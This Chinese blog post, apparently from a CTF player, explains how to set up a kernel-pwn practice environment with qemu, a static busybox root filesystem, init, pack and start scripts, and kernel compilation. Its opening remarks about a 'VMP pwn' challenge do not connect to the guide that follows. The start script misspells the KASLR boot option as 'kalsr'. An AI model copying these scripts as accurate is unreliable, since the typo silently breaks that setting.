这道题差点让我离开人世,我一共复现了3天,第1天连“跳转表”都不会改,被乱七八糟的代码搞崩了心态,第2天又被复杂的算法血虐,凌晨的时候才打出了两个leak,第3天直接调试到吐

官方的exp我调不通(因为环境不一样),这大大阻碍了我的理解,最后慢慢理解程序的代码和exp的用意,不断调整exp进行试错,还是调出来了(虽然是对着wp调的)

这是我第一次搞 VMP pwn,算是长见识了……

kernel environ

手工搭建内核

qemu

轻量级虚拟化设备,我们主要使用 qemu-system- 系列

1
➜  ~ apt-get install qemu  

busybox

轻量级文件系统,适用于 kernel 开发

输入以下网站获取 busybox:

1
https://busybox.net/downloads/
  • .tar.gz 格式解压为 tar -zxvf xx.tar.gz
  • .tar.bz2 格式解压为 tar -jxvf xx.tar.bz2

输入以下指令配置文件:

1
➜  make menuconfig
1
2
3
4
5
6
7
8
9
10
11
│ ┌↑(-)─────────────────────────────────────────────────────────────────┐ │  
│ │[ ] Support NSA Security Enhanced Linux (NEW) │ │
│ │[ ] Clean up all memory before exiting (usually not needed) (NEW) │ │
│ │[*] Support LOG_INFO level syslog messages (NEW) │ │
│ │--- Build Options │ │
│ │[ ] Build static binary (no shared libs) (NEW) // target │ │
│ │[ ] Build position independent executable (NEW) │ │
│ │[ ] Force NOMMU build (NEW) │ │
│ │[ ] Build shared libbusybox (NEW) │ │
│ │() Cross compiler prefix (NEW) │ │
│ │() Path to sysroot (NEW)

在“Build static binary”处按“Y”选中(采用静态编译,为了不添加动态链接库)

直接退出,退出时保存,接下来就是busybox编译了:

1
2
➜  make -j4    
➜ make install

这个“_install”就是编译好的文件了,输入以下指令:(复制 rootfs )

1
➜  cp rootfs -r ..

_install 目录下创建以下文件夹

1
2
3
4
➜  mkdir proc
mkdir sys
touch init
chmod +x init

init 为 linux 的初始化脚本,内容为:

1
2
3
4
5
6
7
8
#!/bin/sh
mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t debugfs none /sys/kernel/debug
mount -t tmpfs none /tmp
mdev -s # We need this to find /dev/sda later
setsid /bin/cttyhack setuidgid 1000 /bin/sh

创建 pack.sh 作为 linux 的打包脚本,内容如下:

1
2
3
4
#!/bin/sh
echo "Generate rootfs.img"
cd busybox # fs folder
find . | cpio -o --format=newc > ../rootfs.img

创建 start.sh 作为 linux 的启动脚本,内容如下:

1
2
3
4
5
6
7
8
9
#!/bin/sh
qemu-system-x86_64 \
-m 64M \
-nographic \
-kernel ./bzImage \
-initrd ./rootfs.img \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 kalsr" \
-smp cores=2,threads=1 \
-cpu kvm64

kernel pwn

一般的 kernel pwn 都有三个文件

1
2
3
boot.sh (启动脚本 - ".sh")
bzImage (内核 - "bzImage")
initramfs.cpio (内置的busybox文件系统 - ".cpio")

在busybox文件系统中就会有对应的驱动文件

1
pwn.ko (驱动文件 - ".ko")

用 file 指令获取目标内核的信息

1
2
➜  babykernel file bzImage
bzImage: Linux kernel x86 boot executable bzImage, version 4.19.26 (bird@ubuntu18) #2 SMP Tue Jun 4 18:57:49 CST 2019, RO-rootFS, swap_dev 0x8, Normal VGA

在 kernel 官网上下载对应版本的内核

1
https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/ 

然后观察它是用什么编译器编译出来的(gcc版本会影响编译)

1
2
3
➜  babykernel strings bzImage | grep gcc
yygcc3s!
4.19.26 (bird@ubuntu18) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04)) #2 SMP Tue Jun 4 18:57:49 CST 2019

输入以下指令配置文件:(直接退出,默认就好)

1
➜  make menuconfig 

在进行 kernel 编译之前要进行 gcc 版本替换

1
2
3
4
5
ls -l /usr/bin/gcc*
sudo apt-get install -y gcc-7 g++-7
sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-7 20 --slave /usr/bin/g++ g++ /usr/bin/g++-7
sudo update-alternatives --config gcc
gcc -v

接下来就是 kernel 编译了(通过“-jn”来指定线程数)

1
➜  make bzImage -j4
  • bzImage:arch/x86/boot/bzImage
  • vmlinux:源码所在的根目录下

下载现有内核

使用如下命令列出可下载内核镜像

1
sudo apt search linux-image-

选一个自己喜欢的下载就行,笔者所用的阿里云源似乎没有最新的5.11的镜像,这里用5.8的做个示范:

1
sudo apt download linux-image-5.8.0-43-generic

下载下来是一个deb文件,解压

1
2
3
4
5
6
7
8
9
10
$ dpkg -X ./linux-image-5.8.0-43-generic_5.8.0-43.49~20.04.1_amd64.deb extract
./
./boot/
./boot/vmlinuz-5.8.0-43-generic
./usr/
./usr/share/
./usr/share/doc/
./usr/share/doc/linux-image-5.8.0-43-generic/
./usr/share/doc/linux-image-5.8.0-43-generic/changelog.Debian.gz
./usr/share/doc/linux-image-5.8.0-43-generic/copyright

遇到的问题

1.Linux内核编译错误

2.kernel无法开启,无效循环(我重新做了一次后发现问题消失了,目前不知道原因)